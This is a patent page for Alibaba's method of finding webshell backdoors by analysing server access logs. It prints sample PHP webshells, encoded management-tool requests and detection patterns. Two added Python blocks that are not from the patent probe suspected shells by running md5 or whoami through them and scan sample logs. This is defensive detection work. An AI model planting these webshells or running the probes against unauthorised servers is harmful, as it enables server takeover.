CN107104924A - The verification method and device of website backdoor file - Google Patents


Info

Publication number: CN107104924A
Application number: CN201610096648.2A
Authority: CN (China)
Prior art keywords: verified, file, internet access, record, access request
Legal status: Granted (Active)
Other languages: Chinese (zh)
Other versions: CN107104924B (en)
Inventor: 李相垚
Current assignee: Alibaba Group Holding Ltd
Original assignee: Alibaba Group Holding Ltd
Application filed by Alibaba Group Holding Ltd; priority to CN201610096648.2A; published as CN107104924A; application granted and published as CN107104924B.

Classifications

    • H ELECTRICITY
    • H04 ELECTRIC COMMUNICATION TECHNIQUE
    • H04L TRANSMISSION OF DIGITAL INFORMATION, e.g. TELEGRAPHIC COMMUNICATION
    • H04L63/00 Network architectures or network communication protocols for network security
    • H04L63/14 Network architectures or network communication protocols for network security for detecting or protecting against malicious traffic
    • H04L63/1408 Network architectures or network communication protocols for network security for detecting or protecting against malicious traffic by monitoring network traffic
    • H04L63/1425 Traffic logging, e.g. anomaly detection
    • H04L63/08 Network architectures or network communication protocols for network security for authentication of entities
    • H04L63/083 Network architectures or network communication protocols for network security for authentication of entities using passwords

Landscapes

  • Engineering & Computer Science (AREA)
  • Computer Security & Cryptography (AREA)
  • Computer Hardware Design (AREA)
  • Computing Systems (AREA)
  • General Engineering & Computer Science (AREA)
  • Computer Networks & Wireless Communication (AREA)
  • Signal Processing (AREA)
  • Information Transfer Between Computers (AREA)

Abstract

The invention discloses a verification method and device for website backdoor files. The method includes: obtaining network access log records; analyzing the network access log records according to the communication protocol used to access website backdoor files, and selecting the network access request records to be verified; selecting a verification mode according to the request type to which the network access request record to be verified belongs; and verifying, by the selected verification mode, whether the file accessed by the network access request record to be verified is a website backdoor file. The invention solves the technical problem in the related art that determining website backdoor files by feature matching has relatively low accuracy and is prone to missed reports and false reports.

Description

The verification method and device of website backdoor file
Technical field
The present invention relates to the internet field, and in particular to a verification method and device for website backdoor files.
Background technology
A Webshell is a website backdoor file: "Web" means that the website server must expose a Web service, and "shell" means obtaining, to some degree, operating rights on the website server. A Webshell is a command execution environment that exists as a web page file written in ASP, PHP, JSP, CGI or similar; it is usually written in the same programming language as the website server and placed in the website directory. A Webshell receives arbitrary parameters from the visitor, adds them to its own code for execution, and returns the result to the visitor. Therefore, after intruding into a website, an attacker usually mixes the Webshell among the normal web page files under the server's Web directory and can then access it with a browser to control the website server over the long term, including but not limited to uploading or downloading files, viewing databases, and executing arbitrary program commands. Because programming languages are versatile and flexible, new Webshells have largely lost static backdoor features and thus easily bypass the detection of backdoor identification tools.
Webshell management tools communicate with the website backdoor file using a dedicated communication protocol in order to implement functions such as browsing disk directories, uploading or downloading files, and executing system commands. The main principle is as follows: a Webshell that can be accessed by the management tool is uploaded to the website; the management tool converts the above functions into dynamically generated code, packages it in the form agreed by the communication protocol, and sends the content to the Webshell as an ordinary web page access. After running the code, the Webshell packages the result according to the same protocol and returns it to the management tool. Although the content of each communication differs with the function invoked, the protocol is fixed, so part of every communication always matches certain features.
Most attackers access an uploaded Webshell through a Webshell management tool. Most Webshells can therefore be associated with the access records produced by such tools. Although website backdoor files vary endlessly, the communication protocol of the management tools that attackers commonly use does not change.
The website backdoor detection method used in the related art installs a backdoor detection tool on the website server and confirms whether backdoor files exist by scanning the website files for backdoor features. These tools essentially all use static analysis and sandbox dynamic debugging: they parse the syntax of the code, construct an execution flow, detect calls to dangerous functions, and finally decide by simulated execution whether the code is a website backdoor.
However, this detection mode has great drawbacks. First, website backdoors are written in a wide variety of programming languages and have no fixed file format, which increases the complexity of feature detection. Second, feature detection depends on a file feature library, and every new kind of backdoor file requires an update to the library, which makes the library consume excessive storage space. Third, website backdoors disguise themselves as normal web page files of the website, so a certain number of missed reports and false reports easily occur during detection.
Moreover, the programming languages used by most website servers support the generation and execution of dynamic code, and the "one-word trojan" backdoor files that are currently fashionable exploit exactly this characteristic to encrypt and obfuscate their code. Such "one-word trojan" backdoor files have completely lost the conventional website backdoor features and therefore easily bypass file feature detection.
Therefore, to prevent the website backdoor file from being found by the webmaster or detected by the security software configured on the website server, an attacker generally chooses a "one-word trojan" as the backdoor file, inserts it into a normal web page file of the website server, and at the same time encrypts or obfuscates the backdoor code so that, on the surface, the file does not look like a backdoor file of the website server.
The following is example code of a common "one-word trojan" backdoor file:
<?php
@eval($_POST['c']);
?>
It is clear that the code above carries an obvious "one-word trojan" feature: the visitor can pass arbitrary code to the eval function and have it executed, so eval is a dangerous function call, and a backdoor detection tool based on file features can find this kind of website backdoor file.
However, consider the following "one-word trojan" backdoor code:
<?php
$c = $_POST['c'];
assert($c);
?>
Although the dangerous function assert is called in this backdoor code, the source of the variable c cannot be confirmed, so the detection effect of most file-feature-based backdoor detection tools on this kind of Webshell backdoor file is in fact unsatisfactory.
In addition, a base64-encoded "one-word trojan" backdoor code is as follows:
<?php
eval(gzuncompress(base64_decode('eJxTiQ/wDw6JVk9Wjw...UAEwkDMw==')));
?>
The above backdoor code is base64-encoded and compressed with gzcompress; on the surface it has no backdoor features at all, and the backdoor code is only restored when it actually runs. Conventional backdoor detection tools are therefore also helpless against this kind of website backdoor file.
No effective solution has yet been proposed for the above problems.
Summary of the invention
Embodiments of the present invention provide a verification method and device for website backdoor files, so as to at least solve the technical problem in the related art that determining website backdoor files by feature matching has relatively low accuracy and is prone to missed reports and false reports.
According to one aspect of the embodiments of the present invention, a verification method for website backdoor files is provided, including:
obtaining network access log records; analyzing the network access log records according to the communication protocol used to access website backdoor files, and selecting the network access request records to be verified; selecting a verification mode according to the request type to which the network access request record to be verified belongs; and verifying, by the selected verification mode, whether the file accessed by the network access request record to be verified is a website backdoor file.
Optionally, analyzing the network access log records according to the communication protocol used to access website backdoor files and selecting the network access request records to be verified includes: using the communication protocol to parse, segment by segment and one by one, all the network access request records contained in the network access log records; and determining as network access request records to be verified those whose parsed request body content contains the code segment executed by the website backdoor file and/or the fixed field set in the communication protocol.
Optionally, selecting a verification mode according to the request type to which the network access request record to be verified belongs includes: extracting the uniform resource locator (URL) from the request line of the network access request record to be verified; determining the request type according to the suffix contained in the URL; and selecting a verification mode for the network access request record to be verified according to the request type.
Optionally, verifying by the verification mode whether the file accessed by the network access request record to be verified is a website backdoor file includes: extracting from the network access request record to be verified the connection password used to access the corresponding file; when the request type is PHP or ASP, searching the network access request record to be verified for the executable code segment corresponding to the connection password; running the executable code segment according to a preset calculation to generate an operation result; and when the operation result is consistent with the preset result, determining that the file accessed by the network access request record to be verified is a website backdoor file.
Optionally, verifying by the verification mode whether the file accessed by the network access request record to be verified is a website backdoor file includes: extracting from the network access request record to be verified the connection password used to access the corresponding file; when the request type is JSP, searching the network access request record to be verified for the executable code segment corresponding to the connection password; running the executable code segment according to a specified command function to generate a display result; and when the display result meets the functional characteristic of the command function, determining that the file accessed by the network access request record to be verified is a website backdoor file.
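The request-type selection (suffix of the URL) and the two verification modes described above (a preset calculation for PHP and ASP, a command function for JSP), as an added example; this is not code from the patent or from Alibaba. The probe payloads (`echo md5("<nonce>");` for PHP, `Response.Write(a*b)` for ASP, `whoami` for JSP), the parameter names and the stand-in transport are assumptions made for illustration; in a real deployment the `send` argument would be an HTTP client. The check executes code through the suspected file, so it should only be run against servers you are authorised to test.

```python
import hashlib
import re
import secrets
from urllib.parse import urlparse


def request_type(url: str) -> str:
    """Step S206: derive the request type from the suffix of the URL path."""
    name = urlparse(url).path.rsplit("/", 1)[-1]
    suffix = name.rsplit(".", 1)[-1].lower() if "." in name else ""
    return {"php": "php", "asp": "asp", "aspx": "asp", "jsp": "jsp"}.get(suffix, "other")


def verify(url: str, password: str, send) -> tuple:
    """Step S208. `send(url, form) -> str` posts a form and returns the response
    body; it is injected so that a real HTTP client or, as below, a constructed
    stand-in can be used. Returns (is_webshell, evidence)."""
    kind = request_type(url)
    if kind in ("php", "asp"):
        # Preset calculation: the expected result is fixed in advance from a fresh
        # nonce, so a static page or a cached reply cannot satisfy it by accident.
        nonce = secrets.token_hex(8)
        if kind == "php":
            code = f'echo md5("{nonce}");'
            expected = hashlib.md5(nonce.encode()).hexdigest()
        else:
            # Assumed ASP probe: classic ASP has no md5(), so multiply two
            # nonce-derived integers kept small enough for a 32-bit Long.
            a, b = int(nonce[:4], 16) + 1, int(nonce[4:7], 16) + 1
            code, expected = f"Response.Write({a}*{b})", str(a * b)
        body = send(url, {password: code})
        hit = expected in body
        return hit, f"{kind}: preset calculation {'matched' if hit else 'not found'}"
    if kind == "jsp":
        # Command function: the output of `whoami` has a recognisable shape
        # (a single token, no markup); that shape is the characteristic checked.
        body = send(url, {password: "whoami"})
        hit = re.fullmatch(r"[\w.\\$-]+", body.strip()) is not None
        return hit, f"jsp: command output {'looks like a user name' if hit else 'unrecognised'}"
    return False, f"{kind}: no verification mode defined"


def stand_in_transport(url: str, form: dict) -> str:
    """Constructed stand-in for an HTTP POST, used only to exercise verify():
    /hehe.php imitates a PHP one-word trojan with password "c" (it honours only
    the md5 probe shape), /up/x.jsp imitates a JSP command shell with parameter
    "cmd", and every other path returns a static error page."""
    path = urlparse(url).path
    if path == "/hehe.php" and "c" in form:
        m = re.fullmatch(r'echo md5\("([0-9a-f]{16})"\);', form["c"])
        return hashlib.md5(m.group(1).encode()).hexdigest() if m else ""
    if path == "/up/x.jsp" and form.get("cmd") == "whoami":
        return "tomcat\n"
    return "<html><body>Not Found</body></html>"


if __name__ == "__main__":
    for url, pw in [("http://127.0.0.1/hehe.php", "c"),
                    ("http://127.0.0.1/hehe.php", "wrong"),
                    ("http://127.0.0.1/up/x.jsp", "cmd"),
                    ("http://127.0.0.1/index.asp", "c")]:
        print(url, pw, verify(url, pw, stand_in_transport))
```

The nonce matters: a probe whose expected result is constant could be satisfied by a page that happens to echo a known string, whereas a fresh value per probe ties the result to code actually executed by the file.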
According to another aspect of the embodiments of the present invention, a verification device for website backdoor files is also provided, including:
an acquisition module for obtaining the network access log records produced by external access to the server; an analysis module for analyzing the network access log records according to the communication protocol used to access website backdoor files and selecting the network access request records to be verified; a selection module for selecting a verification mode according to the request type to which the network access request record to be verified belongs; and a verification module for verifying, by the selected verification mode, whether the file accessed by the network access request record to be verified is a website backdoor file.
Optionally, the analysis module includes: a parsing unit for using the communication protocol to parse, segment by segment and one by one, all the network access request records contained in the network access log records; and a first determining unit for determining as network access request records to be verified those whose parsed request body content contains the code segment executed by the website backdoor file and/or the fixed field set in the communication protocol.
Optionally, the selection module includes: a first extraction unit for extracting the URL from the request line of the network access request record to be verified; a second determining unit for determining the request type according to the suffix contained in the URL; and a selection unit for selecting a verification mode for the network access request record to be verified according to the request type.
Optionally, the verification module includes: a second extraction unit for extracting from the network access request record to be verified the connection password used to access the corresponding file; a search unit for searching the network access request record to be verified for the executable code segment corresponding to the connection password when the request type is PHP or ASP; a generation unit for running the executable code segment according to a preset calculation to generate an operation result; and a third determining unit for determining, when the operation result is consistent with the preset result, that the file accessed by the network access request record to be verified is a website backdoor file.
Optionally, the verification module includes: a second extraction unit for extracting from the network access request record to be verified the connection password used to access the corresponding file; a search unit for searching the network access request record to be verified for the executable code segment corresponding to the connection password when the request type is JSP; a generation unit for running the executable code segment according to a specified command function to generate a display result; and a third determining unit for determining, when the display result meets the functional characteristic of the command function, that the file accessed by the network access request record to be verified is a website backdoor file.
In the embodiments of the present invention, no feature matching is performed on backdoor files. Instead, the network access log records retained on the server are analyzed according to the communication protocol used to access website backdoor files in order to select the network access request records to be verified, and a verification mode chosen according to the request type of those records confirms whether a network backdoor file really exists. This effectively improves the success rate of identifying website backdoor files and significantly reduces the probability of missed reports and false reports during verification, thereby solving the technical problem in the related art that determining website backdoor files by feature matching has relatively low accuracy and is prone to missed reports and false reports.
Brief description of the drawings
The drawings described here are provided for a further understanding of the present invention and constitute part of this application; the schematic embodiments of the present invention and their description are used to explain the present invention and do not constitute an improper limitation of it. In the drawings:
Fig. 1 is a hardware block diagram of a computer terminal for the verification method of website backdoor files according to an embodiment of the present invention;
Fig. 2 is a flowchart of the verification method of website backdoor files according to an embodiment of the present invention;
Fig. 3 is a structural block diagram of the verification device for website backdoor files according to an embodiment of the present invention;
Fig. 4 is a structural block diagram of the verification device for website backdoor files according to a preferred embodiment of the present invention;
Fig. 5 is a structural block diagram of a computer terminal according to an embodiment of the present invention.
Detailed description of the embodiments
To enable those skilled in the art to better understand the solution of the present invention, the technical solutions in the embodiments of the present invention are described clearly and completely below with reference to the accompanying drawings. Obviously, the described embodiments are only some, not all, of the embodiments of the present invention. All other embodiments obtained by those of ordinary skill in the art on the basis of the embodiments of the present invention without creative effort shall fall within the scope protected by the present invention.
It should be noted that the terms "first", "second", etc. in the description, claims and drawings are used to distinguish similar objects and not to describe a specific order or sequence. It should be understood that data so used may be interchanged where appropriate, so that the embodiments of the invention described here can be implemented in orders other than those illustrated or described. In addition, the terms "comprising" and "having" and any variations of them are intended to cover non-exclusive inclusion; for example, a process, method, system, product or device that contains a series of steps or units is not necessarily limited to the steps or units expressly listed, but may include other steps or units that are not expressly listed or that are inherent to the process, method, product or device.
Embodiment 1
According to an embodiment of the present invention, a method embodiment of the verification method for website backdoor files is provided. It should be noted that the steps illustrated in the flowcharts of the drawings may be executed in a computer system such as a set of computer-executable instructions, and that although a logical order is shown in the flowcharts, in some cases the steps shown or described may be performed in an order different from the one given here.
The method embodiment provided in Embodiment 1 of this application may be executed in a mobile terminal, a computer terminal or a similar computing device. Taking execution on a computer terminal as an example, Fig. 1 is a hardware block diagram of a computer terminal for the verification method of website backdoor files according to an embodiment of the present invention. As shown in Fig. 1, computer terminal 10 may include one or more processors 102 (only one is shown in the figure; processor 102 may include, but is not limited to, a processing unit such as a microcontroller MCU or a programmable logic device FPGA), a memory 104 for storing data, and a transmission device 106 for communication functions. Those of ordinary skill in the art will understand that the structure shown in Fig. 1 is only illustrative and does not limit the structure of the above electronic device. For example, computer terminal 10 may also include more or fewer components than shown in Fig. 1, or a configuration different from that shown in Fig. 1.
Memory 104 may be used to store software programs and modules of application software, such as the program instructions/modules corresponding to the verification method of website backdoor files in the embodiment of the present invention; processor 102 executes various functional applications and data processing by running the software programs and modules stored in memory 104, thereby implementing the above verification method of website backdoor files. Memory 104 may include high-speed random access memory and may also include non-volatile memory, such as one or more magnetic storage devices, flash memory, or other non-volatile solid-state memory. In some examples, memory 104 may further include memory located remotely from processor 102, and such remote memory may be connected to computer terminal 10 through a network. Examples of the network include, but are not limited to, the internet, an intranet, a local area network, a mobile communication network, and combinations thereof.
Transmission device 106 is used to receive or send data via a network. A specific example of the network may include a wireless network provided by the communication provider of computer terminal 10. In one example, transmission device 106 includes a network interface controller (NIC), which can be connected to other network devices through a base station so as to communicate with the internet. In one example, transmission device 106 may be a radio frequency (RF) module used to communicate with the internet wirelessly.
In the above operating environment, this application provides the verification method of website backdoor files shown in Fig. 2. Fig. 2 is a flowchart of the verification method of website backdoor files according to an embodiment of the present invention. The method includes the following processing steps:
Step S202: obtain network access log records, where the network access log records may be generated by an external client (for example, a personal computer) accessing the local server, or of course by an external mobile terminal or other device accessing the local server;
Step S204: analyze the network access log records according to the communication protocol used to access website backdoor files, and select the network access request records to be verified; for example, by recognizing the Webshell communication protocol, find in the server logs the records of the attacker accessing the Webshell;
Step S206: select a verification mode according to the request type to which the network access request record to be verified belongs;
Step S208: verify, by the selected verification mode, whether the file accessed by the network access request record to be verified is a website backdoor file.
The backdoor detection schemes provided in the related art can only search for features in static code, or simulate execution after syntax analysis; neither can reverse the real code, nor identify the real behavior of the program. With the technical scheme provided by the embodiment of the present invention, no feature matching of backdoor files is needed. Instead, the network access log records retained on the server are analyzed according to the communication protocol used to access website backdoor files in order to select the network access request records to be verified, and a verification mode chosen according to the request type of those records confirms whether a network backdoor file really exists. This identifies not only conventional website backdoor files but also obfuscated ones, effectively improving the success rate of identifying website backdoor files, significantly reducing the probability of missed reports and false reports during verification, and thereby solving the technical problem in the related art that determining website backdoor files by feature matching has relatively low accuracy and is prone to missed reports and false reports.
Optionally, in step S204, analyzing the network access log records according to the communication protocol used to access website backdoor files and selecting the network access request records to be verified may include the following steps:
Step S1: using the communication protocol, parse segment by segment, one by one, all the network access request records contained in the network access log records;
Step S2: determine as network access request records to be verified those whose parsed request body content contains the code segment executed by the website backdoor file and/or the fixed field set in the communication protocol.
Website backdoor files usually leave access records of the Webshell page and data submission records in the Web logs of the website server. Moreover, a backdoor file only executes specific commands after receiving external parameters, and to ensure that the website backdoor can only be used by its visitor, the backdoor file usually has a unique connection password, which can be obtained by analyzing the log content. The operating principle of Webshell management tools is essentially this: encoded command parameters are inserted into a Web request, where the first parameter is the connection password, and the request is then passed to the backdoor file.
The communication protocol of Webshell management tools is broadly divided into the following three layers:
The first layer is the function that executes PHP code, for example eval, assert, etc.;
The second layer is the decoding function for base64 encoding, for example base64_decode;
The third layer is the base64-encoded code, i.e. the request body content mentioned in step S2 above, which is also the part this application needs to focus on and parse.
The code that the attacker, as the visitor, wants to execute is stored after base64 encoding in the third layer above. At present, to evade the scanning of server security detection tools, mainstream Webshell management tools all seek improvements in the first or second layer in order to obfuscate the backdoor code. However, whichever transformation is used, the starting part of the base64 encoding is normally fixed, so a matching operation can be performed on this feature.
In a Web request, the user can customize many parameters, such as the uniform resource locator (URL), the User-Agent, the data stored on the user's local terminal (Cookie), and the submitted data (post_data). All of these controllable points can be used by a Webshell management tool to pass parameters. Therefore, log analysis can determine whether the content of these controllable points in each Web log entry matches the communication protocol features of Webshell management tools. If it does, information such as the URL and connection password of this log entry can be stored in a database to await further detection.
The above log analysis process is described in further detail below, taking network access requests of PHP type, ASP type and JSP type as examples in turn.
1. Network access requests of PHP type
Assume that there is a webshell hehe.php under the root directory of the target website, with the following content:
<?php @eval($_POST[8]); ?>
This is a common, relatively simple PHP-type "one-word trojan".
A normal access request sent by a browser has the following form:
GET /hehe.php HTTP/1.1
Content-Type: application/x-www-form-urlencoded
Host: 127.0.0.1
Content-Length: 765
Connection: Close
However, a PHP-type access request sent by a Webshell management tool has the following form:
POST /hehe.php HTTP/1.1
Content-Type: application/x-www-form-urlencoded
Host: 127.0.0.1
Content-Length: 765
Connection: Close
8=@eval(base64_decode(QGV2YWwBKGJhc2U2NF9kZWNvZGUoJF9QT1NUW3owXSkpOw));&z0=QGluaV9zZXQoImRpc3BsYXlfZXJyb3JzIiwiMCIpO0BzZXRfdGltZV9saW1pdCgwKTtAc2V0X21hZ2ljX3F1b3Rlc19ydW50aW1lKDApO2VjaG8oIi0+fCIpOzskRD1iYXNlNjRfZGVjb2RlKCRfUE9TVFsiejEiXSk7JEY9QG9wZW5kaXIoJEQpO2lmKCRGPT1OVUxMKXtlY2hvKCJFUlJPUjovLyBQYXRoIE5vdCBGb3VuZCBPciBObyBQZXJtaXNzaW9uISIpO31lbHNleyRNPU5VTEw7JEw9TlVMTDt3aGlsZSgkTj1AcmVhZGRpcigkRikpeyRQPSRELiIvIi4kTjskVD1AZGF0ZSgiWS1tLWQgSDppOnMiLEBmaWxlbXRpbWUoJFApKTtAJEU9c3Vic3RyKGJhc2VfY29udmVydChAZmlsZXBlcm1zKCRQKSwxMCw4KSwtNCk7JFI9Ilx0Ii4kVC4iXHQiLkBmaWxlc2l6ZSgkUCkuIlx0Ii4kRS4iCiI7aWYoQGlzX2RpcigkUCkpJE0uPSROLiIvIi4kUjtlbHNlICRMLj0kTi4kUjT9ZWNobyAkTS4kTDtAY2xvc2VkaXIoJEYpO307ZWNobygifDwtIik7ZGllKCk7&z1=RDpcXHhhbXBwXFxodGRvY3NcXA==
Need to analyze the access request that above-mentioned use Webshell management tools are sent below:
First, the equal sign left-hand digit " 8 " occurred for the first time in POST contents is the password of the Webshell, its $ _ POST [8] in correspondence code;That is, first is appeared in each access request sent by Webshell management tools The content on the equal sign left side is the connection password of the Webshell.
Secondly, it is one section of PHP code that the content on the right of equal sign is appeared in for the first time, and its basic format is usually:@eval (base64_decode(var1));Wherein, the content " var1 " inside innermost layer bracket by base64 it is encoded in Hold, then decoding functions in the one layer of bracket in outside, and it is outermost, it is that PHP performs function;In addition, the content inside var1 is usual For@eval (base64_decode ($ _ POST [z0]));
Finally, the content following the ";" may carry one or more variables z1 to z5. These variables are all base64-encoded, and decoding them reveals further PHP code.
Based on this analysis, the log analysis process provided by the embodiment of the present invention needs to do the following:
(1) Extract the Webshell connection password from the access request sent by the Webshell management tool.
(2) The innermost var1 in @eval(base64_decode(var1)) is in some cases not contiguous, which makes it hard to match. However, the base64 content usually has to perform the action of "receiving the follow-up variable" (for example, receiving z0), and the only way to receive it is "$_POST[z0]". It is therefore enough to match the base64 string corresponding to $_POST[z0] to conclude, with reasonable confidence, that the access request was sent by a Webshell management tool. Since z0 may vary, in general only "$_POST[" is matched.
It should be noted that the above "$_POST[" is the fixed field set in the communication protocol mentioned in step S2.
(3) The result of matching "$_POST[" only establishes that the access request is suspected of having been sent by a Webshell management tool, because "$_POST[" may also appear encrypted in legitimate business requests. At this point the base64 content in z1 to z5 must be matched further; that content necessarily contains code that a Webshell can execute, for example @set_magic_quotes_runtime(0); @set_time_limit(0). Only after the base64 content in z1 to z5 has been matched can the file be further determined to be a Webshell.
It should be noted that the code executable by a Webshell that necessarily appears in z1 to z5 is the code segment executed by the website backdoor file mentioned in step S2.
2. Internet access requests of the ASP type
Assume that an ASP-type access request sent by a Webshell management tool takes the following form:
Ysh=Execute (" Execute (" " On+Error+Resume+Next:Function+bd(byVal+s):For + i=1+To+Len (s)+Step+2:C=Mid (s, i, 2):If+IsNumeric(Mid(s,i,1))+Then:Execute (" " " " bd=bd&chr (s &H " " " " &c& " " " ") " " " "):Else:Execute (" " " " bd=bd&chr (s &H " " " " &c&Mid (s,i+2,2)&"""")""""):I=i+2:End+If""&chr(10)&""Next:End+Function: Response.Write(""""->|""""):Execute(""""On+Error+Resume+Next:""""&bd(""""44696D2052523A52523D6264285265717565737428227A312229293A46756E6374696F6E204644286474293A46443D596561722864742926222D223A4966204C656E284D6F6E746828647429293D31205468656E3A4644203D204644262230223A456E642049663A46443D4644264D6F6E7468286474292622 2D223A4966204C656E2844617928647429293D31205468656E3A46443D4644262230223A456E642049663A46443D464426446179286474292622202226466F726D617444617465 54696D652864742C342926223A223A4966204C656E285365636F6E6428647429293D31205468656E3A46443D4644262230223A456E642049663A46443D4644265365636F6E64286474293A456E642046756E6374696F6E3A53455420433D4372656174654F626A6563742822536372697074696E672E46696C6553797374656D4F626A65637422293A53657420464F3D432E476574466F6C6465722282222265252262222293A496620457272205468656E3A526573706F6E73652E577269746528224552524F523A2F2F2022264572722E4465736372697074696F6E293A4572722E436C6561723A456C73653A466F722045616368204620696E20464F2E737562666F6C646572733A526573706F6E73652E577269746520462E4E616D6526636872283437292663687228392926464428462E446174654C6173744D6F646966696564292663687228392926636872283438292663687228392926432E476574466F6C64657228462E50617468292E6174747269627574657326636872283130293A4E6578743A466F722045616368204C20696E20464F2E66696C65733A526573706F6E73652E5772697465204C2E4E616D6526636872283929264644284C2E446174654C6173744D6F6469666965642926636872283929264C2E73697A652663687228392926432E47657446696C65284C2E50617468292E6174747269627574657326636872283130293A4E6578743A456E64204966"""")): Response.Write(""""|<-""""):Response.End " ") ") &z1=663A5C5C7573725C5C4C6F63616C557365725C5C717877313539303936303432355C5C636F6E6669675C5C
Based on this analysis, the log analysis process provided by the embodiment of the present invention needs to do the following:
(1) As with PHP-type requests, extract the Webshell connection password from the access request sent by the Webshell management tool.
(2) Compared with PHP-type requests, the code in the front part of an ASP-type request is more heavily obfuscated and harder to match, so matching of the front code section of ASP-type requests can be omitted. That is, for ASP it is not necessary to determine the internet access request record to be verified by judging whether the parsed request body content contains the fixed field set in the communication protocol.
(3) The middle section of an ASP-type request is a hexadecimal (hex) encoded string of considerable length. It contains the function CreateObject("Scripting.FileSystemObject") that a Webshell must use, which in hex is "4372656174654f626a6563742822536372697074696e672e46696c6553797374656d4f626a6563742229". A match on this function allows a preliminary determination that the file is a Webshell.
It should be noted that the code executable by a Webshell that necessarily appears in z1 to z5 is the code segment executed by the website backdoor file mentioned in step S2.
3. Internet access requests of the JSP type
Assume that a JSP-type access request sent by a Webshell management tool takes the following form:
Ch023=B&z0=UTF-8&z1=D:\\Install+Software\\tomcat7\\webapps\\cxzm\\
Based on this analysis, the log analysis process provided by the embodiment of the present invention needs to do the following:
(1) As with PHP-type requests, extract the Webshell connection password from the access request sent by the Webshell management tool.
(2) The upper-case letter to the right of the first equals sign in the JSP-type request above is an operation code; the letters A to Z denote different operations. The z0 in JSP-type requests stays essentially unchanged, so the regular expression =[A-Z]&z0= can be used here.
It should be noted that for JSP-type internet access requests it is usually only necessary to perform the matching operation mentioned in step S2, i.e. whether the parsed request body content contains the fixed field set in the communication protocol.
Optionally, in step S206, choosing the verification mode according to the request type to which the internet access request record to be verified belongs includes the following operations:
Step S3: extract the URL from the request line of the internet access request record to be verified;
Step S4: determine the request type from the suffix of the URL;
Step S5: choose the verification mode for the internet access request record to be verified according to the request type.
For example: from the request line "POST /hehe.php HTTP/1.1" of a PHP-type access request sent by a Webshell management tool, the URL "hehe.php" can be extracted by parsing; its suffix ".php" then shows that this is a PHP-type internet access request, so the PHP-type verification scheme can be chosen for it.
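The log analysis stage described above (steps S2 to S5: connection-password extraction, the "$_POST[" and z-variable matching for PHP, the hex match on CreateObject("Scripting.FileSystemObject") for ASP, the =[A-Z]&z0= pattern for JSP, and the URL-suffix type selection) can be run over access-log records as follows. This is an added example, not code from the patent or from Alibaba; the log records are constructed to mirror the page's request layouts, the 16-character minimum for a base64 run is an assumption, and the verdict labels ("suspected", "to_verify") are mine.

```python
import base64
import re
from urllib.parse import urlsplit

# Hex form of the COM call the page says an ASP webshell must make; computed
# from the plaintext rather than typed in so it cannot be mis-copied.
FSO_HEX = b'CreateObject("Scripting.FileSystemObject")'.hex()
# Code the page names as necessarily present in the decoded z-variables.
PHP_EXEC_MARKERS = ("set_magic_quotes_runtime(", "set_time_limit(", "@eval(")
# Page's pattern for JSP requests: one-letter opcode, fixed z0.
JSP_OPCODE_RE = re.compile(r"=[A-Z]&z0=")
# A run long enough to be worth trying as base64 (16 is an assumption).
B64_RUN_RE = re.compile(r"[A-Za-z0-9+/]{16,}={0,2}")


def parse_record(raw: str):
    """Split one raw HTTP request record into (method, path, body)."""
    head, _, body = raw.partition("\n\n")
    method, path, _version = head.splitlines()[0].split()
    return method, path, body.strip()


def request_type_from_url(path: str):
    """Steps S3/S4: the suffix of the URL path decides php / asp / jsp."""
    name = urlsplit(path).path.rsplit("/", 1)[-1]
    suffix = name.rsplit(".", 1)[-1].lower() if "." in name else ""
    return suffix if suffix in ("php", "asp", "jsp") else None


def form_fields(body: str) -> dict:
    """Split k=v&k=v on '&' only; no percent-decoding, so base64 stays intact."""
    fields = {}
    for part in body.split("&"):
        key, _, value = part.partition("=")
        fields.setdefault(key, value)
    return fields


def extract_connection_password(body: str) -> str:
    """Step (1): the text left of the first '=' is the connection password."""
    return body.split("=", 1)[0]


def decoded_base64_runs(text: str):
    """Yield the plaintext of every base64-looking run inside text."""
    for run in B64_RUN_RE.findall(text):
        padded = run + "=" * (-len(run) % 4)
        try:
            yield base64.b64decode(padded).decode("utf-8", "replace")
        except ValueError:
            continue


def analyze_php(body: str) -> str:
    """Step (2): '$_POST[' in the decoded first value -> suspected only;
    step (3): webshell-executable code in decoded z0..z5 -> send to verification."""
    fields = form_fields(body)
    first_value = next(iter(fields.values()), "")
    if not any("$_POST[" in plain for plain in decoded_base64_runs(first_value)):
        return "none"
    for name in ("z0", "z1", "z2", "z3", "z4", "z5"):
        for plain in decoded_base64_runs(fields.get(name, "")):
            if any(marker in plain for marker in PHP_EXEC_MARKERS):
                return "to_verify"
    return "suspected"


def analyze_asp(body: str) -> str:
    """ASP: only the hex middle section is matched (hex case is irrelevant)."""
    return "to_verify" if FSO_HEX in body.lower() else "none"


def analyze_jsp(body: str) -> str:
    return "to_verify" if JSP_OPCODE_RE.search(body) else "none"


ANALYZERS = {"php": analyze_php, "asp": analyze_asp, "jsp": analyze_jsp}


def analyze_record(raw: str) -> dict:
    method, path, body = parse_record(raw)
    rtype = request_type_from_url(path)
    verdict = ANALYZERS[rtype](body) if method == "POST" and rtype else "none"
    password = extract_connection_password(body) if verdict != "none" else None
    return {"url": path, "type": rtype, "password": password, "verdict": verdict}


def scan_log(records) -> list:
    return [analyze_record(r) for r in records]


def _b64(s: str) -> str:
    return base64.b64encode(s.encode()).decode()

# Constructed sample log laid out like the page's requests (not real traffic).
_STAGE1 = _b64("@eval(base64_decode($_POST[z0]));")
_Z0 = _b64('@ini_set("display_errors","0");@set_time_limit(0);'
           '@set_magic_quotes_runtime(0);echo("->|");'
           '$D=base64_decode($_POST["z1"]);echo("|<-");die();')
_Z1 = _b64("D:\\\\xampp\\\\htdocs\\\\")
_ASP_HEX = ('Dim RR:RR=bd(Request("z1")):SET C='
            'CreateObject("Scripting.FileSystemObject")').encode().hex().upper()
SAMPLE_LOG = [
    "POST /hehe.php HTTP/1.1\nHost: 127.0.0.1\n\n"
    f"8=@eval(base64_decode({_STAGE1}));&z0={_Z0}&z1={_Z1}",
    "POST /hehe.php HTTP/1.1\nHost: 127.0.0.1\n\n"      # stage 1 only: suspected
    f"8=@eval(base64_decode({_STAGE1}));",
    "POST /hehe.asp HTTP/1.1\nHost: 127.0.0.1\n\n"
    'ysh=Execute("On Error Resume Next:"&bd("' + _ASP_HEX + '"))&z1=663A5C5C',
    "POST /hehe.jsp HTTP/1.1\nHost: 127.0.0.1\n\nCh023=B&z0=UTF-8&z1=D:\\\\tomcat7\\\\",
    "POST /login.php HTTP/1.1\nHost: 127.0.0.1\n\nusername=alice&password=s3cret",
    "GET /index.html HTTP/1.1\nHost: 127.0.0.1\n\n",
]

if __name__ == "__main__":
    for r in scan_log(SAMPLE_LOG):
        print(r)
```

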